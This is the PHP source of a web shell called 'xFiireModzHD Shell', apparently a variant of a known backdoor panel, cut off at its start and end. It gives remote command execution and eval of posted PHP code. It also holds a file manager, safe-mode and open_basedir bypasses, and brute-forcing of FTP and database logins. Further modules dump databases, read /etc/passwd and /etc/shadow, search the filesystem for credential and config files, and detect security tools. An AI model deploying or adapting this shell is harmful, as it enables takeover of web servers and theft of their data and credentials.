xFiireModzHD Shell« est un site a but non lucratif copyrightę 2015-2016 "; //For Ensuring... Fuck all Robots... /*------------------ End of Anti Crawler -----*/ if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if( isset( $_POST['c'] ) ) @chdir($_POST['c']); $cwd = @getcwd(); if( $os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/'; if($os == 'win') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); } function ex($in) { $out = ''; if(function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); }elseif(function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); }elseif(function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); }elseif(function_exists('shell_exec')) { $out = shell_exec($in); }elseif(is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function which($p) { $path = ex('which '.$p); if(!empty($path)) return $path; return false; } function printHeader() { if(empty($_POST['charset'])) $_POST['charset'] = "UTF-8"; global $color; echo ' '.VERSION.'
'; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $disable_functions = @ini_get('disable_functions'); $release = @php_uname('r'); $kernel = @php_uname('s'); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0;$i<$n-1;$i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Bypass'=>'SafeMode','Safe Mode'=>'Bypass','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Readable Dirs'=>'Readable','Port Scanner'=>'PortScanner','Symlink'=>'Symlink','Get User'=>'GetUser','Mailer'=>'Mailer','About'=>'about'); if(!empty($GLOBALS['auth_pass'])) $m['SelfKill'] = 'SelfRemove'; $m['Logout'] = 'Logout'; $menu = ''; foreach($m as $k => $v) $menu .= ''.$k.''; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach( range('a','z') as $drive ){ if (is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } $drives .= '
: '; } if($GLOBALS['os'] == 'nix') { $dominios = @file_get_contents("/etc/named.conf"); if(!$dominios) { $d0c = "CANT READ named.conf"; } else { @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out); $out = sizeof(array_unique($out[1])); $d0c = $out." Domains"; } } else { $d0c = " --- "; } if($GLOBALS['os'] == 'nix' ) { $usefl = ''; $dwnldr = ''; if(!@ini_get('safe_mode')) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); foreach($userful as $item) { if(which($item)) $usefl.= $item.','; } $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.','; } } else { $usefl = ' ------- '; $dwnldr = ' ------- '; } } else { $usefl = ' ------- '; $dwnldr = ' ------- '; } echo ''. ''. '

Uname: '.substr(@php_uname(), 0, 120).'
User: '.$uid.' ( '.$user.' ) Group: '.$gid.' ( '.$group.' )
Server: '.@getenv('SERVER_SOFTWARE').'
Useful: '.$usefl.'
Downloaders: '.$dwnldr.'
Disabled functions: '.($disable_functions?$disable_functions:'All Function Enable').'
'.($GLOBALS['os'] == 'win'?'Drives
Cwd':'Cwd').'
: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
Server IP
Client IP
HDD
Free
PHP
Safe Mode
Domains
: '.gethostbyname($_SERVER["HTTP_HOST"]).'
: '.$_SERVER['REMOTE_ADDR'].'
: '.viewSize($totalSpace).'
: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)
: '.@phpversion().' [ phpinfo ]
: '.($GLOBALS['safe_mode']?'ON':'OFF').'
: '.$d0c.'
'. '
'.$menu.'
'; } function printFooter() { $is_writable = is_writable($GLOBALS['cwd'])?"[ Writeable ]":"[ Not writable ]"; echo '
Change dir:
Read file:
Make dir:
'.$is_writable.'
Make file:
'.$is_writable.'
Execute:
Upload file:
'.$is_writable.'
'; } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return ''.perms(@fileperms($f)).''; elseif (!@is_writable($f)) return ''.perms(@fileperms($f)).''; else return ''.perms(@fileperms($f)).''; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } if (!$_SESSION[login]) system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI'],$auth_pass); function actionSecInfo() { printHeader(); echo '

Server security information

'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo ''.$n.': '; if(strpos($v, "\n") === false) echo $v.'
'; else echo '
'.$v.'
'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '
'; if( $GLOBALS['os'] == 'nix' ) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { echo '
'; $temp=array(); foreach ($userful as $item) if(which($item)){$temp[]=$item;} showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(which($item)){$temp[]=$item;} showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(which($item)){$temp[]=$item;} showSecParam('Downloaders', implode(', ',$temp)); echo '
'; showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('HDD space', ex('df -h')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings',ex('net accounts')); showSecParam('User Accounts',ex('net user')); } echo '
'; printFooter(); } function actionPhp() { if( isset($_POST['ajax']) ) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } printHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '

PHP info

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '

'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '

Execution PHP-code

'; echo ' send using AJAX
';
        if(!empty($_POST['p1'])) {
            ob_start();
            eval($_POST['p1']);
            echo htmlspecialchars(ob_get_clean());
        }
        echo '
'; printFooter(); } function actionFilesMan() { printHeader(); echo '

File manager

'; if(isset($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_SESSION['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']); } elseif($_SESSION['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION['f'] as $f) @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); } unset($_SESSION['f']); break; default: if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); $_SESSION['cwd'] = @$_POST['c']; } break; } echo ''; } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!'; return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo ' '; echo ""; $dirs = $files = $links = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'].$dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) $links[] = array_merge($tmp, array('type' => 'link')); elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); usort($links, "cmp"); $files = array_merge($dirs, $links, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo '
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');">[ '.htmlspecialchars($f['name']).' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').'
  
'; printFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$iString conversions
'; $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'bin2hex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo "
send using AJAX
";
        if(!empty($_POST['p1'])) {
            if(function_exists($_POST['p1']))
            echo htmlspecialchars($_POST['p1']($_POST['p2']));
        }
        echo"
"; printFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: ".$type); } $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { } exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } printHeader(); echo '

File tools

'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); $gid = @posix_getgrgid(@fileowner($_POST['p1'])); echo 'Name: '.htmlspecialchars($_POST['p1']).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
';
                $fp = @fopen($_POST['p1'], 'r');
                if($fp) {
                    while( !@feof($fp) )
                        echo htmlspecialchars(@fread($fp, 1024));
                    @fclose($fp);
                }
                echo '
'; break; case 'highlight': if( is_readable($_POST['p1']) ) { echo '
'; $code = highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; else die(''); } echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { @file_put_contents($_POST['p1'],$_POST['p3']); echo 'Saved!
'; } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "\n"; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(@touch($_POST['p1'],$time,$time)) die(''); else { echo 'Fail!'; } } else echo 'Bad time format!'; } echo '
'; break; case 'mkfile': break; } echo '
'; printFooter(); } function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."\n"; break; case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."\n"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); printHeader(); echo '

Safe mode bypass

'; echo 'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
'; if($temp) echo '
'.$temp.'
'; echo '
'; printFooter(); } function actionConsole() { if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); echo "document.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "document.mf.c.value='".$GLOBALS['cwd']."';"; } } echo "document.cf.output.value+='".$temp."';"; echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } printHeader(); echo ''; echo '

Console

send using AJAX
'; echo '
'; printFooter(); } function actionLogout() { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo '
'; } function actionSelfRemove() { printHeader(); if($_POST['p1'] == 'yes') { if(@unlink(SELF_PATH)) die('Shell has been removed'); else echo 'unlink error!'; } echo '

Suicide

Really want to remove the shell?
Yes
'; printFooter(); } function actionBruteforce() { printHeader(); if( isset($_POST['proto']) ) { echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''"; $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo "Attempts: $attempts Success: $success

"; } echo '

FTP bruteforce

' .'' .'' .'' .'' .'' .'' .'
Type
' .'' .'' .'' .'Server:port
Brute type
' .'' .'' .'
Login
Dictionary
' .'
'; echo '

'; printFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->res = @mysql_list_dbs($this->link); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error($this->link); break; case 'pgsql': return @pg_last_error($this->link); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'mysql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function dump($table) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); echo $create[1].";\n\n"; $this->query('SELECT * FROM `'.$table.'`'); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; } break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; } break; } return false; } }; $db = new DbClass(@$_POST['type']); if(@$_POST['p2']=='download') { ob_start("ob_gzhandler", 4096); $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } printHeader(); echo '

Sql browser

Type Host Login Password Database
'; $tmp = ""; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "'; } else echo $tmp; }else echo $tmp; echo '
'; if(isset($db) && $db->link){ echo "
